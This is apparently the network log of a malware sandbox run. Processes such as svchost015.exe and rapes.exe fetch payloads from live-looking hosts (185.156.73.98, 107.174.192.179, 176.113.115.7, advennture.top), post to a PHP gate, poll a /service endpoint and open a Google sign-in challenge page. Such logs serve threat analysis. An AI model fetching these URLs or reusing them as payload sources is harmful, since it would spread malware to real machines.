Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mJ00qh1X5SBw%2BOPw0E64VM3dOXj5vVx8zS0XfGGO45qmhy3gET77bE8QBIWVKLsmUxp37%2BLI2uCLUHPCKdRRepxFn1ifQ7pxeYmpMp7TzA2vpjpg8JCitQUOZduYSiPo"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927fe4092810369a-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=45228&min_rtt=43110&rtt_var=12643&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=661&delivery_rate=81668&cwnd=253&unsent_bytes=0&cid=5a229ddcb20f83e7&ts=250&x=0"
POST

https://advennture.top/GKsiio

d744367ecb.exe

Remote address:

104.21.25.9:443

Request

POST /GKsiio HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Length: 103
Host: advennture.top

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tiflLA4zGGhlxv7UKx8RrNgHDnFRNLsvWf2V%2FCTCQGYYv5C7nXnmzP4uCic16RQXkdr0J8ZhyLwIKNJ2HcVI4Zj2sGs%2FX4ufMEBG7pnb5XG3gUccvUxPDN5ZcjkTg5RR2Q%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927fe40938f08862-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=44743&min_rtt=42949&rtt_var=12091&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2852&recv_bytes=678&delivery_rate=81103&cwnd=253&unsent_bytes=0&cid=9dbe54829a33b13c&ts=190&x=0"
GET

http://185.156.73.98/ycl

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /ycl HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: d
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="dll";
Content-Length: 242176
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://185.156.73.98/ycl

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /ycl HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: s
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:59:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="soft";
Content-Length: 3096296
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://45.93.20.28/

57dbff855a.exe

Remote address:

45.93.20.28:80

Request

GET / HTTP/1.1
Host: 45.93.20.28
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://45.93.20.28/85a1cacf11314eb8.php

57dbff855a.exe

Remote address:

45.93.20.28:80

Request

POST /85a1cacf11314eb8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK
Host: 45.93.20.28
Content-Length: 212
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/ycl

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /ycl HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: d
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="dll";
Content-Length: 242176
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://185.156.73.98/ycl

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /ycl HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: s
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="soft";
Content-Length: 3096296
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

172.217.16.238
DNS

spocs.getpocket.com

firefox.exe

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

getpocket.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

getpocket.cdn.mozilla.net

IN A

Response

getpocket.cdn.mozilla.net

IN CNAME

getpocket-cdn.prod.mozaws.net

getpocket-cdn.prod.mozaws.net

IN CNAME

prod.pocket.prod.cloudops.mozgcp.net

prod.pocket.prod.cloudops.mozgcp.net

IN A

34.120.5.221
DNS

getpocket.cdn.mozilla.net

firefox.exe

Remote address:

8.8.8.8:53

Request

getpocket.cdn.mozilla.net

IN A
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A

Response

youtube.com

IN A

172.217.16.238
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN A
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A

Response

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A
GET

https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

firefox.exe

Remote address:

172.217.16.238:443

Request

GET /account?=https://accounts.google.com/v3/signin/challenge/pwd HTTP/2.0
host: youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
GET

https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd

firefox.exe

Remote address:

172.217.16.238:443

Request

GET /account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd HTTP/2.0
host: www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
DNS

www.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

172.217.169.78

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

216.58.212.238

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

172.217.169.14

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

142.250.180.14
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.187.206
GET

https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1

firefox.exe

Remote address:

142.250.187.206:443

Request

GET /m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1 HTTP/2.0
host: consent.youtube.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
cookie: SOCS=CAAaBgiA8Jy_Bg
cookie: YSC=R4-CPIjoC80
cookie: __Secure-YEC=CgtYcDBvbzdJQWtuYyjq-Z-_BjIKCgJHQhIEGgAgVQ%3D%3D
cookie: VISITOR_PRIVACY_METADATA=CgJHQhIEGgAgVQ%3D%3D
upgrade-insecure-requests: 1
sec-fetch-dest: document
sec-fetch-mode: navigate
sec-fetch-site: none
sec-fetch-user: ?1
te: trailers
GET

https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30

firefox.exe

Remote address:

34.120.5.221:443

Request

GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30 HTTP/2.0
host: getpocket.cdn.mozilla.net
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
if-none-match: W/"566c-gZ4b9k1ZDsECRpHn2dprj3Ctmjw"
te: trailers
DNS

prod.ads.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube.com

IN AAAA

Response

youtube.com

IN AAAA

2a00:1450:4009:821::200e
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A

Response

shavar.prod.mozaws.net

IN A

44.240.131.83

shavar.prod.mozaws.net

IN A

54.213.200.248

shavar.prod.mozaws.net

IN A

44.227.3.195
DNS

shavar.prod.mozaws.net

firefox.exe

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

prod.remote-settings.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:c47c::
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN A

Response

youtube-ui.l.google.com

IN A

216.58.212.238

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

172.217.169.14

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

172.217.169.78
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.187.206
DNS

prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.pocket.prod.cloudops.mozgcp.net

IN A

Response

prod.pocket.prod.cloudops.mozgcp.net

IN A

34.120.5.221
DNS

youtube-ui.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN AAAA

Response

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:81d::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:81e::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:80b::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:819::200e
DNS

prod.pocket.prod.cloudops.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

Response

prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:524c::
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN AAAA

Response

consent.youtube.com

IN AAAA

2a00:1450:4009:81f::200e
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.180.4
GET

https://www.google.com/favicon.ico

firefox.exe

Remote address:

142.250.180.4:443

Request

GET /favicon.ico HTTP/2.0
host: www.google.com
user-agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://consent.youtube.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.180.4
DNS

www.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:81e::2004
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.187.206
DNS

consent.youtube.com

firefox.exe

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.187.206
GET

http://185.156.73.98/success?substr=mixthree&s=three&sub=none

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /success?substr=mixthree&s=three&sub=none HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:26 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://107.174.192.179/app/u75a1_003.exe

rapes.exe

Remote address:

107.174.192.179:80

Request

GET /app/u75a1_003.exe HTTP/1.1
Host: 107.174.192.179

Response

HTTP/1.1 200 OK

Server: nginx/1.22.1
Date: Sat, 29 Mar 2025 14:00:27 GMT
Content-Type: application/octet-stream
Content-Length: 1313792
Last-Modified: Fri, 28 Mar 2025 06:53:45 GMT
Connection: keep-alive
ETag: "67e64779-140c00"
Accept-Ranges: bytes
GET

http://185.156.73.98/success?substr=mixfour&s=three&sub=none

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /success?substr=mixfour&s=three&sub=none HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:27 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/info

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /info HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:33 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 21
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/update

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /update HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:33 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Length: 99856
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:34 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:36 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:38 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:40 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:42 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:45 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:47 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:49 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:51 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:53 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

svchost015.exe

Remote address:

185.156.73.98:80

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 14:00:55 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://176.113.115.7/files/fate/random.exe

rapes.exe

Remote address:

176.113.115.7:80

Request

GET /files/fate/random.exe HTTP/1.1
Host: 176.113.115.7

Response

